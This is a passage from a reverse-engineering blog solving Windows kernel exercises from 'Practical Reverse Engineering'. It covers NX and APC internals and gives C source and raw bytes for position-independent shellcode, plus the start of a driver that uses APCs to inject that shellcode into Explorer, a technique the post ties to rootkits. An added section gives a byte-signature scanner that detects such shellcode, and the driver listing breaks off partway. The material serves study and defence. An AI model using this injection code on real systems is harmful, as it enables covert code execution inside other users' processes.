<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">Also make sure you have Windows debug symbols installed and loaded. At this point, using <i>!print_symbol</i> initializes the supported symbols, and <i>!print_layout</i> produces the final output.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">This is a POC and it was a good exercise to practice with WinDbg extensions; I am planning to rework this source code to make it compatible with all versions of Windows on 32 and 64 bit. At the moment it is not very fast: it takes a few minutes to print the whole layout, but I think it is possible to speed up the processing by avoiding the brute force loop on every page and handling the pages in a smarter way based on the contents of the PDEs and PTEs (basically, if a PDE is invalid I can exclude a lot of memory addresses from the loop).</span></div>
<div>
</div>
<br />
<span style="font-family: Verdana, sans-serif;"><b>Solution to some of "The Windows kernel" exercises from Practical Reverse Engineering (part 2)</b> (Scrammed!, giulia, 2015-02-09)</span><br /><div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">
Here is the second part of the solutions to the "Windows Kernel" exercises from the "Practical Reverse Engineering" book. Specifically, this post is about the first eight exercises in the "Investigating and Extending your Knowledge" section.<br>
It should be noted that the code proposed in my solutions is intended as working POCs, and that the methodologies can be generalized/improved so that they work independently of the Windows version etc. Finally, the ideas I used to solve the exercises are based on known mechanisms (e.g. the <i>KeUserModeCallback</i> method).<br><br>
<b>1)</b></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><i>NX</i> is a bit set in the page tables that specifies whether a memory page can run executable code or not. If the CPU tries to execute code from a page that is not marked as executable, an exception is raised. Windows (and other OSes too) leverages this bit in order to mark heap and stack data areas as not executable. In this way, should a buffer overflow happen, an attacker will not be able to exploit it in order to jump to a shellcode on the heap or stack. This bit is supported on <i>x64</i> architecture, and on x<i>86</i> with <i>PAE</i> enabled.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">Prior to the introduction of this bit, there were some software implementations that tried to provide non-executable data by using hardware segmentation </span><span style="font-family: Verdana, sans-serif;">(e.g. </span><i style="font-family: Verdana, sans-serif;">W^X</i><span style="font-family: Verdana, sans-serif;"> and </span><i style="font-family: Verdana, sans-serif;">ExecShield</i><span style="font-family: Verdana, sans-serif;">)</span><span style="font-family: Verdana, sans-serif;">. The x86 hardware, in fact, provides segmentation in order to define code and data segments, each with its own properties (read, write or execute). Normally, Windows (32bit) creates usermode code and data segments (CS and DS) that are as big as the whole 32bit addressable range: this means that according to the code segment properties, every possible 32bit address is executable (the division between usermode and kernelmode is done via the page tables). This leaves the opportunity for an exploit to write shellcodes in data areas and execute them. To sort out this problem without the NX bit, it is possible to make a code segment smaller, in order to leave out a range of addresses that are not part of it. Then a data segment can be created using this range of memory that is not part of the code segment. At this point, the code segment can be marked as executable, and the data segment can be marked as read/write only, ensuring that if the execution ends up in the range of addresses reserved for the data, an exception is raised.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">Another potential way to emulate the NX bit would be to mark the page table entries of the heap and stack as invalid: every access to such a page would trigger a page fault, which would be trapped by the page fault handler. The OS would then have to determine the kind of access (read, write or instruction fetch); if it is an instruction fetch, something is wrong and the process is terminated. In theory this works, but in practice it adds a very large runtime overhead (every memory access to those pages would cause an exception!), so it may not be feasible (the PaX Linux kernel patch uses a similar approach).</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><b>2) </b></span><br />
<span style="font-family: Verdana, sans-serif;">The APIs that provide the functionality to manage APCs are <i>KeInitializeApc</i> and <i>KeInsertQueueApc</i>. Since they are not declared in the DDK headers, it is necessary to obtain their addresses via <i>MmGetSystemRoutineAddress</i> and assign them to appropriately typed function pointers in order to use them.</span><br />
<ul>
<li><span style="font-family: Verdana, sans-serif;"><i>KeInitializeApc</i> simply initializes a KAPC structure by storing into it all the necessary information about the APC that is going to be queued for execution, including the KTHREAD to which the APC must be queued and the addresses of the callbacks to run.</span></li>
<li><span style="font-family: Verdana, sans-serif;"><i>KeInsertQueueApc</i>, instead, does the actual work of scheduling the APC for execution in the given <i>KAPC.Thread</i> (of type KTHREAD). To do so, it begins by acquiring the spinlock stored in <i>KTHREAD.ApcQueueLock</i>, necessary for proper synchronization. Then, if <i>KTHREAD.ApcQueueable</i> is set to 1, the API invokes the internal function <i>KiInsertQueueApc</i>, which in turn verifies that <i>KAPC.Inserted</i> is set to 0 and, if it is, adds the APC to one of the queues referenced by the <i>KTHREAD.ApcStatePointer</i> array. In particular, this array contains two pointers to <i>KAPC_STATE</i> structures, where the APC queues (implemented with LIST_ENTRYs) are actually stored.<br>Why two? The first <i>KAPC_STATE</i> structure holds the APCs whose <i>KAPC.ApcStateIndex</i> is <i>OriginalApcEnvironment</i>, while the second holds the ones whose <i>KAPC.ApcStateIndex</i> is <i>AttachedApcEnvironment</i>. Basically, the value of <i>KAPC.ApcStateIndex</i> differentiates between the APCs that run in the context of the process to which the thread belongs and the ones that run while the thread is attached to a different process. This is why two structures are kept.<br>Once the correct one is determined, a further choice has to be made. Each structure contains an array of two LIST_ENTRY structures (named <i>KAPC_STATE.ApcListHead</i>), selected according to the value stored in <i>KAPC.ApcMode</i>, which is either 0 (KernelMode) or 1 (UserMode). These are the actual APC queues.<br>Once the APC is queued, the member <i>KAPC.Inserted</i> is set to 1 and, if the APC is kernelmode, <i>KTHREAD.KAPC_STATE.KernelApcPending</i> is also set to 1. Furthermore, <i>HalRequestSoftwareInterrupt</i> may be invoked to switch to APC_LEVEL.</span></li>
<li><span style="font-family: Verdana, sans-serif;">The queues of APCs will eventually be walked by the </span><i style="font-family: Verdana, sans-serif;">KiDeliverApc</i><span style="font-family: Verdana, sans-serif;"> API, which will call the various kernel, normal and rundown routines for each APC.</span></li>
</ul>
<span style="font-family: Verdana, sans-serif;">APCs offer the possibility to execute code inside a specific process's context, and there are various possible use cases for them. Windows uses APCs to perform thread suspension, to schedule completion routines, to set and get a thread's context, and more.</span><br />
<span style="font-family: Verdana, sans-serif;">Usermode APCs provide a handy way to execute usermode code from kernelmode, a technique commonly used by rootkits since it makes it possible to inject malicious payloads into running processes, hook their APIs, etc. Examples are presented in the answer to exercise 3.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><b>3)</b></span><br />
<span style="font-family: Verdana, sans-serif;">Since there is no directly available API to create a process from kernel mode, I decided to </span><span style="font-family: Verdana, sans-serif;">leverage APCs to run malicious usermode code in a particular process</span><span style="font-family: Verdana, sans-serif;">. I devised three different ways to achieve this goal and, although all of them rely on APCs, their approach changes considerably.</span><br />
<span style="font-family: Verdana, sans-serif;">The general strategy involves some preliminary operations to locate the target process, obtain a handle to it and allocate some memory in its address space. The malicious code is then copied into this memory area (injection) and an APC is initialized in one of the following ways:</span><br />
<ol>
<li><span style="font-family: Verdana, sans-serif;">Usermode APC with the normal routine set to the allocated area, that contains the malicious code.</span></li>
<li><span style="font-family: Verdana, sans-serif;">Kernelmode APC with the kernel routine set to hook a user-mode API. In this case, the allocated area contains the assembly code of the hook, that will be executed only once,</span><span style="font-family: Verdana, sans-serif;"> in the context of the target process.</span></li>
<li><span style="font-family: Verdana, sans-serif;">Kernelmode APC with the kernel routine set to overwrite an empty entry in the kernel-to-usermode callback table with the address of the allocated area, and let </span><span style="font-family: Verdana, sans-serif;"><i>KeUserModeCallback</i> call it. The allocated area contains the malicious code.</span></li>
</ol>
<div>
<span style="font-family: Verdana, sans-serif;">There are of course many other methods to start a process from kernelmode code. For example, a possible variant of <i>the second method</i>, not involving APCs, would consist of using <i>PsSetCreateProcessNotifyRoutine</i> in order to inject the malicious code into every process that is created and then hooking a common API to redirect its execution towards the malicious code. However, here I chose to focus solely on the three above-mentioned ideas.</span></div>
<br />
<span style="font-family: Verdana, sans-serif;">
<u><b>Method 1</b></u></span><br />
<span style="font-family: Verdana, sans-serif;">For the first method, I used the APCs in the most natural way: I queued a usermode APC to <i>Explorer</i> that simply runs a "shellcode", which in turn locates and calls the <i>CreateProcess</i> </span><span style="font-family: Verdana, sans-serif;">API to execute <i>Notepad</i>.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">First of all, I needed to have the usermode shellcode, thus I wrote the following usermode application:</span><br />
<style type="text/css">
pre.CICodeFormatter{
font-family:arial;
font-size:12px;
border:1px dashed #CCCCCC;
width:99%;
height:auto;
overflow:auto;
background:#f0f0f0;
line-height:20px;
background-image:URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0RLiAlfLucI_qoHJvHaLwvgXby8Z5TK-aqUneDA06kscMW-ILm4a94iJq4qsFWJQEUtkkWWtnA6woWdwoPT2LE4DB2URdsSOOa3-smdrFFQB1oG2jam0NLQaJYk7Z95MyTJNdoHSDytEn/s320/codebg.gif);
padding:0px;
color:#000000;
text-align:left;
}
pre.CICodeFormatter code{
color:#000000;
word-wrap:normal;
}
</style>
<pre class="CICodeFormatter"><code class="CICodeFormatter">#include <stdio.h>
#include <intrin.h>
#include <windows.h>

typedef BOOL (*PCREATEPROCESS)(LPCTSTR lpApplicationName, LPTSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes,
                               LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment,
                               LPCTSTR lpCurrentDirectory, LPSTARTUPINFO lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation);

void main(void)
{
    unsigned __int64 ptrPEB;
    unsigned __int64 ptrPEB_LDR_DATA;
    unsigned __int64 ptrInLoadOrderModuleList;
    unsigned __int64 DllBase;
    unsigned int *pNames, *pAddresses;
    PCREATEPROCESS pCreateProcess;
    wchar_t *DllPath;
    char app_notepad[12];
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    IMAGE_DOS_HEADER *pMZ;
    IMAGE_NT_HEADERS *pPE;
    IMAGE_EXPORT_DIRECTORY *pExpDir;
    CHAR *currentName;

    // The command line is built one character at a time, so that no string
    // literal ends up in a data section outside the copied function body.
    app_notepad[0] = 'n';
    app_notepad[1] = 'o';
    app_notepad[2] = 't';
    app_notepad[3] = 'e';
    app_notepad[4] = 'p';
    app_notepad[5] = 'a';
    app_notepad[6] = 'd';
    app_notepad[7] = '.';
    app_notepad[8] = 'e';
    app_notepad[9] = 'x';
    app_notepad[10] = 'e';
    app_notepad[11] = 0;

    //memset(&si, 0, sizeof(si)); done by hand to avoid a CRT call
    for(int j = 0; j < sizeof(si); j++)
    {
        ((char *)&si)[j] = 0;
    }
    si.cb = sizeof(si);
    //memset(&pi, 0, sizeof(pi));
    for(int j = 0; j < sizeof(pi); j++)
    {
        ((char *)&pi)[j] = 0;
    }

    // TEB.ProcessEnvironmentBlock -> PEB.Ldr -> InLoadOrderModuleList
    ptrPEB = __readgsqword(0x60);
    ptrPEB_LDR_DATA = *(unsigned __int64 *)(ptrPEB + 0x18);
    ptrInLoadOrderModuleList = *((unsigned __int64 *)(ptrPEB_LDR_DATA + 0x10));
    DllPath = (wchar_t*) *(unsigned __int64 *)(ptrInLoadOrderModuleList + 0x50);
    DllPath += 0x14; // skip "C:\windows\system32\"
    while(true)
    {
        // 6b 00 65 00 72 00 6e 00 - 65 00 6c 00 33 00 32 00 - 2e 00 64 00 6c 00 6c 00
        if( ((unsigned __int64 *)DllPath)[0] == 0x006e00720065006b &&
            ((unsigned __int64 *)DllPath)[1] == 0x00320033006c0065 &&
            ((unsigned __int64 *)DllPath)[2] == 0x006c006c0064002e )
        {
            break;
        }
        ptrInLoadOrderModuleList = *((unsigned __int64 *)ptrInLoadOrderModuleList);
        DllPath = (wchar_t*) *(unsigned __int64 *)(ptrInLoadOrderModuleList + 0x50);
        DllPath += 0x14; // skip "C:\windows\system32\"
    }
    DllBase = *(unsigned __int64 *)(ptrInLoadOrderModuleList + 0x30);

    // Parse the PE header of kernel32.dll and walk its export names
    pMZ = (IMAGE_DOS_HEADER*)DllBase;
    pPE = (IMAGE_NT_HEADERS*)(DllBase + pMZ->e_lfanew);
    pExpDir = (IMAGE_EXPORT_DIRECTORY*)(DllBase + pPE->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
    pNames = (unsigned int *)(DllBase + pExpDir->AddressOfNames);
    pAddresses = (unsigned int *)(DllBase + pExpDir->AddressOfFunctions);
    for(unsigned int i = 0; i < pExpDir->NumberOfNames; i++)
    {
        currentName = (CHAR*)(DllBase + pNames[i]);
        //43 72 - 65 61 - 74 65 - 50 72 - 6f 63 - 65 73 - 73 41
        if( ((unsigned __int64 *) currentName)[0] == 0x7250657461657243 &&
            ((unsigned __int32 *) currentName)[2] == 0x7365636f &&
            ((unsigned short *) currentName)[6] == 0x4173 )
        {
            pCreateProcess = (PCREATEPROCESS)(DllBase + pAddresses[i]);
            break;
        }
    }
    pCreateProcess(NULL, (LPTSTR)app_notepad, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
}
</code></pre>
</div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">This code purposely avoids any imported API or CRT function in order to be position independent. As a result, after compiling it, I was able to simply copy all the opcodes generated for the "main" function and use them as an executable buffer that gets injected into a running process.</span><br />
<span style="font-family: Verdana, sans-serif;">The shellcode behaves similarly to the ones found in exploits: it accesses the PEB to get the <i>PEB_LDR_DATA</i> and its <i>InLoadOrderModuleList</i> field, which is a pointer to a list of <i>LDR_DATA_TABLE_ENTRY</i> structures, each representing a loaded module. The code walks the list to locate <i>kernel32.dll</i> (the DLL name is kept in LDR_DATA_TABLE_ENTRY.FullDllName) and, once found, retrieves its imagebase via LDR_DATA_TABLE_ENTRY.DllBase. It is then straightforward to parse the PE header of the DLL in order to locate its export table and, from it, the address of the <i>CreateProcessA</i> API. The shellcode concludes by calling that API to launch Notepad.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
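<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">As an added example (not code from the original post), here is a small C scanner of the kind used for memory triage: it looks in a dumped executable region for the byte sequences that the shellcode above necessarily leaves behind, namely the gs:[0x60] PEB read and the hardcoded immediates used to match "kernel32.dll" and "CreateProcessA" without string literals. The indicator list, the two sample buffers (constructed here from those sequences plus filler) and the function names are this example's own assumptions.</span></div>

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Byte sequences that position independent API-resolution code of the kind
   shown above leaves in memory. They are what a memory scanner (or a YARA
   rule) would look for in an executable region not backed by a mapped image. */
typedef struct {
    const char *name;
    const uint8_t *bytes;
    size_t len;
} indicator_t;

/* mov rax, gs:[60h]            (x64 TEB -> PEB pointer read) */
static const uint8_t IND_PEB_READ[]   = { 0x65, 0x48, 0x8B, 0x04, 0x25, 0x60, 0x00, 0x00, 0x00 };
/* mov rcx, 006E00720065006Bh   (UTF-16 "kern" as an immediate) */
static const uint8_t IND_KERN_UTF16[] = { 0x48, 0xB9, 0x6B, 0x00, 0x65, 0x00, 0x72, 0x00, 0x6E, 0x00 };
/* mov rcx, 7250657461657243h   (ASCII "CreatePr" as an immediate) */
static const uint8_t IND_CREATEPR[]   = { 0x48, 0xB9, 0x43, 0x72, 0x65, 0x61, 0x74, 0x65, 0x50, 0x72 };

static const indicator_t INDICATORS[] = {
    { "x64 PEB access via gs:[0x60]",               IND_PEB_READ,   sizeof IND_PEB_READ   },
    { "UTF-16 'kern' compared as an immediate",     IND_KERN_UTF16, sizeof IND_KERN_UTF16 },
    { "ASCII 'CreatePr' compared as an immediate",  IND_CREATEPR,   sizeof IND_CREATEPR   },
};
#define N_INDICATORS (sizeof INDICATORS / sizeof INDICATORS[0])

/* Portable memmem: 1 if needle occurs anywhere in hay. */
static int contains(const uint8_t *hay, size_t hay_len, const uint8_t *needle, size_t needle_len)
{
    if (needle_len == 0 || hay_len < needle_len)
        return 0;
    for (size_t i = 0; i + needle_len <= hay_len; i++)
        if (memcmp(hay + i, needle, needle_len) == 0)
            return 1;
    return 0;
}

/* Number of distinct indicators present in the region. Two or more hits in a
   private executable region deserve a closer look; a lone PEB read is only a
   weak signal, since legitimate loader code performs it too. */
int count_indicators(const uint8_t *region, size_t len)
{
    int hits = 0;
    for (size_t i = 0; i < N_INDICATORS; i++)
        if (contains(region, len, INDICATORS[i].bytes, INDICATORS[i].len))
            hits++;
    return hits;
}

/* Constructed sample standing in for a page dumped from an anonymous RWX
   region: filler around the three sequences. */
static const uint8_t SAMPLE_INJECTED[] = {
    0x48, 0x81, 0xEC, 0x68, 0x01, 0x00, 0x00,
    0x65, 0x48, 0x8B, 0x04, 0x25, 0x60, 0x00, 0x00, 0x00,
    0x48, 0x89, 0x44, 0x24, 0x50,
    0x48, 0xB9, 0x6B, 0x00, 0x65, 0x00, 0x72, 0x00, 0x6E, 0x00, 0x48, 0x39, 0x08,
    0x48, 0xB9, 0x43, 0x72, 0x65, 0x61, 0x74, 0x65, 0x50, 0x72, 0x48, 0x39, 0x08,
    0xC3
};

/* Constructed benign sample: the same names as plain text in a data page. */
static const uint8_t SAMPLE_BENIGN[] = "explorer.exe kernel32.dll CreateProcessA";

int scan_injected_sample(void) { return count_indicators(SAMPLE_INJECTED, sizeof SAMPLE_INJECTED); }
int scan_benign_sample(void)   { return count_indicators(SAMPLE_BENIGN, sizeof SAMPLE_BENIGN - 1); }

int main(void)
{
    printf("injected sample: %d indicator(s)\n", scan_injected_sample());
    for (size_t i = 0; i < N_INDICATORS; i++)
        if (contains(SAMPLE_INJECTED, sizeof SAMPLE_INJECTED, INDICATORS[i].bytes, INDICATORS[i].len))
            printf("  matched: %s\n", INDICATORS[i].name);
    printf("benign sample:   %d indicator(s)\n", scan_benign_sample());
    return 0;
}
```

<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">In practice such a scan is run over the regions that a VAD walk flags as suspicious to begin with, typically private (non-image) allocations that are both writable and executable, which is exactly what the driver below creates with PAGE_EXECUTE_READWRITE.</span></div>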
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">Having the shellcode sorted out, let's see the code for the kernelmode driver (note that the shellcode bytes are stored in the "buffer[]" array):</span></div>
<pre class="CICodeFormatter"><code class="CICodeFormatter">#include <Ntifs.h>
#include <string.h>

// Opcodes of the "main" function of the usermode program above (the shellcode).
unsigned char buffer[] = {
    0x48, 0x81, 0xEC, 0x68, 0x01, 0x00, 0x00, 0xC6, 0x84, 0x24, 0x38, 0x01, 0x00, 0x00, 0x6E, 0xC6,
    0x84, 0x24, 0x39, 0x01, 0x00, 0x00, 0x6F, 0xC6, 0x84, 0x24, 0x3A, 0x01, 0x00, 0x00, 0x74, 0xC6,
    0x84, 0x24, 0x3B, 0x01, 0x00, 0x00, 0x65, 0xC6, 0x84, 0x24, 0x3C, 0x01, 0x00, 0x00, 0x70, 0xC6,
    0x84, 0x24, 0x3D, 0x01, 0x00, 0x00, 0x61, 0xC6, 0x84, 0x24, 0x3E, 0x01, 0x00, 0x00, 0x64, 0xC6,
    0x84, 0x24, 0x3F, 0x01, 0x00, 0x00, 0x2E, 0xC6, 0x84, 0x24, 0x40, 0x01, 0x00, 0x00, 0x65, 0xC6,
    0x84, 0x24, 0x41, 0x01, 0x00, 0x00, 0x78, 0xC6, 0x84, 0x24, 0x42, 0x01, 0x00, 0x00, 0x65, 0xC6,
    0x84, 0x24, 0x43, 0x01, 0x00, 0x00, 0x00, 0xC7, 0x84, 0x24, 0x50, 0x01, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0xEB, 0x10, 0x8B, 0x84, 0x24, 0x50, 0x01, 0x00, 0x00, 0xFF, 0xC0, 0x89, 0x84, 0x24,
    0x50, 0x01, 0x00, 0x00, 0x48, 0x63, 0x84, 0x24, 0x50, 0x01, 0x00, 0x00, 0x48, 0x83, 0xF8, 0x68,
    0x73, 0x12, 0x48, 0x63, 0x84, 0x24, 0x50, 0x01, 0x00, 0x00, 0xC6, 0x84, 0x04, 0xC0, 0x00, 0x00,
    0x00, 0x00, 0xEB, 0xD0, 0xC7, 0x84, 0x24, 0xC0, 0x00, 0x00, 0x00, 0x68, 0x00, 0x00, 0x00, 0xC7,
    0x84, 0x24, 0x54, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xEB, 0x10, 0x8B, 0x84, 0x24, 0x54,
    0x01, 0x00, 0x00, 0xFF, 0xC0, 0x89, 0x84, 0x24, 0x54, 0x01, 0x00, 0x00, 0x48, 0x63, 0x84, 0x24,
    0x54, 0x01, 0x00, 0x00, 0x48, 0x83, 0xF8, 0x18, 0x73, 0x12, 0x48, 0x63, 0x84, 0x24, 0x54, 0x01,
    0x00, 0x00, 0xC6, 0x84, 0x04, 0x80, 0x00, 0x00, 0x00, 0x00, 0xEB, 0xD0, 0x65, 0x48, 0x8B, 0x04,
    0x25, 0x60, 0x00, 0x00, 0x00, 0x48, 0x89, 0x84, 0x24, 0x30, 0x01, 0x00, 0x00, 0x48, 0x8B, 0x84,
    0x24, 0x30, 0x01, 0x00, 0x00, 0x48, 0x8B, 0x40, 0x18, 0x48, 0x89, 0x84, 0x24, 0x48, 0x01, 0x00,
    0x00, 0x48, 0x8B, 0x84, 0x24, 0x48, 0x01, 0x00, 0x00, 0x48, 0x8B, 0x40, 0x10, 0x48, 0x89, 0x84,
    0x24, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x84, 0x24, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x40,
    0x50, 0x48, 0x89, 0x44, 0x24, 0x50, 0x48, 0x8B, 0x44, 0x24, 0x50, 0x48, 0x83, 0xC0, 0x28, 0x48,
    0x89, 0x44, 0x24, 0x50, 0x33, 0xC0, 0x83, 0xF8, 0x01, 0x74, 0x74, 0x48, 0x8B, 0x44, 0x24, 0x50,
    0x48, 0xB9, 0x6B, 0x00, 0x65, 0x00, 0x72, 0x00, 0x6E, 0x00, 0x48, 0x39, 0x08, 0x75, 0x2C, 0x48,
    0x8B, 0x44, 0x24, 0x50, 0x48, 0xB9, 0x65, 0x00, 0x6C, 0x00, 0x33, 0x00, 0x32, 0x00, 0x48, 0x39,
    0x48, 0x08, 0x75, 0x17, 0x48, 0x8B, 0x44, 0x24, 0x50, 0x48, 0xB9, 0x2E, 0x00, 0x64, 0x00, 0x6C,
    0x00, 0x6C, 0x00, 0x48, 0x39, 0x48, 0x10, 0x75, 0x02, 0xEB, 0x34, 0x48, 0x8B, 0x84, 0x24, 0x98,
    0x00, 0x00, 0x00, 0x48, 0x8B, 0x00, 0x48, 0x89, 0x84, 0x24, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8B,
    0x84, 0x24, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x40, 0x50, 0x48, 0x89, 0x44, 0x24, 0x50, 0x48,
    0x8B, 0x44, 0x24, 0x50, 0x48, 0x83, 0xC0, 0x28, 0x48, 0x89, 0x44, 0x24, 0x50, 0xEB, 0x85, 0x48,
    0x8B, 0x84, 0x24, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x40, 0x30, 0x48, 0x89, 0x44, 0x24, 0x68,
    0x48, 0x8B, 0x44, 0x24, 0x68, 0x48, 0x89, 0x84, 0x24, 0xA8, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x84,
    0x24, 0xA8, 0x00, 0x00, 0x00, 0x48, 0x63, 0x40, 0x3C, 0x48, 0x8B, 0x4C, 0x24, 0x68, 0x48, 0x03,
    0xC8, 0x48, 0x8B, 0xC1, 0x48, 0x89, 0x44, 0x24, 0x78, 0x48, 0x8B, 0x44, 0x24, 0x78, 0x8B, 0x80,
    0x88, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x4C, 0x24, 0x68, 0x48, 0x03, 0xC8, 0x48, 0x8B, 0xC1, 0x48,
    0x89, 0x44, 0x24, 0x70, 0x48, 0x8B, 0x44, 0x24, 0x70, 0x8B, 0x40, 0x20, 0x48, 0x8B, 0x4C, 0x24,
    0x68, 0x48, 0x03, 0xC8, 0x48, 0x8B, 0xC1, 0x48, 0x89, 0x84, 0x24, 0xA0, 0x00, 0x00, 0x00, 0x48,
    0x8B, 0x44, 0x24, 0x70, 0x8B, 0x40, 0x1C, 0x48, 0x8B, 0x4C, 0x24, 0x68, 0x48, 0x03, 0xC8, 0x48,
    0x8B, 0xC1, 0x48, 0x89, 0x44, 0x24, 0x60, 0xC7, 0x84, 0x24, 0x58, 0x01, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0xEB, 0x10, 0x8B, 0x84, 0x24, 0x58, 0x01, 0x00, 0x00, 0xFF, 0xC0, 0x89, 0x84, 0x24,
    0x58, 0x01, 0x00, 0x00, 0x48, 0x8B, 0x44, 0x24, 0x70, 0x8B, 0x40, 0x18, 0x39, 0x84, 0x24, 0x58,
    0x01, 0x00, 0x00, 0x0F, 0x83, 0x86, 0x00, 0x00, 0x00, 0x8B, 0x84, 0x24, 0x58, 0x01, 0x00, 0x00,
    0x48, 0x8B, 0x8C, 0x24, 0xA0, 0x00, 0x00, 0x00, 0x8B, 0x04, 0x81, 0x48, 0x8B, 0x4C, 0x24, 0x68,
    0x48, 0x03, 0xC8, 0x48, 0x8B, 0xC1, 0x48, 0x89, 0x84, 0x24, 0xB0, 0x00, 0x00, 0x00, 0x48, 0x8B,
    0x84, 0x24, 0xB0, 0x00, 0x00, 0x00, 0x48, 0xB9, 0x43, 0x72, 0x65, 0x61, 0x74, 0x65, 0x50, 0x72,
    0x48, 0x39, 0x08, 0x75, 0x45, 0x48, 0x8B, 0x84, 0x24, 0xB0, 0x00, 0x00, 0x00, 0x81, 0x78, 0x08,
    0x6F, 0x63, 0x65, 0x73, 0x75, 0x34, 0x48, 0x8B, 0x84, 0x24, 0xB0, 0x00, 0x00, 0x00, 0x0F, 0xB7,
    0x40, 0x0C, 0x3D, 0x73, 0x41, 0x00, 0x00, 0x75, 0x21, 0x8B, 0x84, 0x24, 0x58, 0x01, 0x00, 0x00,
    0x48, 0x8B, 0x4C, 0x24, 0x60, 0x8B, 0x04, 0x81, 0x48, 0x8B, 0x4C, 0x24, 0x68, 0x48, 0x03, 0xC8,
    0x48, 0x8B, 0xC1, 0x48, 0x89, 0x44, 0x24, 0x58, 0xEB, 0x05, 0xE9, 0x55, 0xFF, 0xFF, 0xFF, 0x48,
    0x8D, 0x84, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x48, 0x48, 0x8D, 0x84, 0x24,
    0xC0, 0x00, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x40, 0x48, 0xC7, 0x44, 0x24, 0x38, 0x00, 0x00,
    0x00, 0x00, 0x48, 0xC7, 0x44, 0x24, 0x30, 0x00, 0x00, 0x00, 0x00, 0xC7, 0x44, 0x24, 0x28, 0x00,
    0x00, 0x00, 0x00, 0xC7, 0x44, 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0x45, 0x33, 0xC9, 0x45, 0x33,
    0xC0, 0x48, 0x8D, 0x94, 0x24, 0x38, 0x01, 0x00, 0x00, 0x33, 0xC9, 0xFF, 0x54, 0x24, 0x58, 0x33,
    0xC0, 0x48, 0x81, 0xC4, 0x68, 0x01, 0x00, 0x00, 0xC3
};

// KAPC_ENVIRONMENT is not in the DDK headers either, so it is redefined here.
typedef enum _KAPC_ENVIRONMENT
{
    OriginalApcEnvironment,
    AttachedApcEnvironment,
    CurrentApcEnvironment,
    InsertApcEnvironment
} KAPC_ENVIRONMENT, *PKAPC_ENVIRONMENT;

// Prototypes of the undocumented APIs, resolved at run time via MmGetSystemRoutineAddress.
typedef VOID (*PFN_KeInitializeApc)(PRKAPC Apc, PKTHREAD Thread, KAPC_ENVIRONMENT Environment, PKKERNEL_ROUTINE KernelRoutine, PKRUNDOWN_ROUTINE RundownRoutine OPTIONAL, PKNORMAL_ROUTINE NormalRoutine OPTIONAL, KPROCESSOR_MODE ApcMode, PVOID NormalContext);
typedef BOOLEAN (*PFN_KeInsertQueueApc)(PKAPC Apc, PVOID SystemArgument1, PVOID SystemArgument2, KPRIORITY Increment);

// Dummy kernel routine: the OS requires one, here it only frees the KAPC.
VOID KernelRoutine(struct _KAPC *Apc,
                   PKNORMAL_ROUTINE *NormalRoutine,
                   PVOID *NormalContext,
                   PVOID *SystemArgument1,
                   PVOID *SystemArgument2)
{
    UNREFERENCED_PARAMETER(NormalRoutine);
    UNREFERENCED_PARAMETER(NormalContext);
    UNREFERENCED_PARAMETER(SystemArgument1);
    UNREFERENCED_PARAMETER(SystemArgument2);
    DbgPrint("APC kernel routine\n");
    ExFreePool(Apc);
}

VOID MyUnload(PDRIVER_OBJECT DriverObject)
{
    UNREFERENCED_PARAMETER(DriverObject);
    DbgPrint("Unload routine\n");
}

NTSTATUS
DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)
{
    PEPROCESS p_proc;
    LIST_ENTRY *lentry;
    LIST_ENTRY *le;
    char *pImgFNam;
    HANDLE pid;
    BOOLEAN check = FALSE;
    HANDLE ProcHandle = 0;
    OBJECT_ATTRIBUTES ObjAttr;
    SIZE_T region_size = 4096;
    ULONG_PTR zero_bits = 0;
    UNICODE_STRING apiName;
    PVOID baseaddr = NULL;
    NTSTATUS status_code;
    CLIENT_ID client_id;
    PETHREAD ethreads;
    KAPC_STATE apc_state;
    PFN_KeInitializeApc PKeInitializeApc;
    PFN_KeInsertQueueApc PKeInsertQueueApc;
    struct _KAPC *pApc;

    UNREFERENCED_PARAMETER(RegistryPath);
    DriverObject->DriverUnload = &MyUnload;

    // Walk ActiveProcessLinks starting from the current process until the target is found.
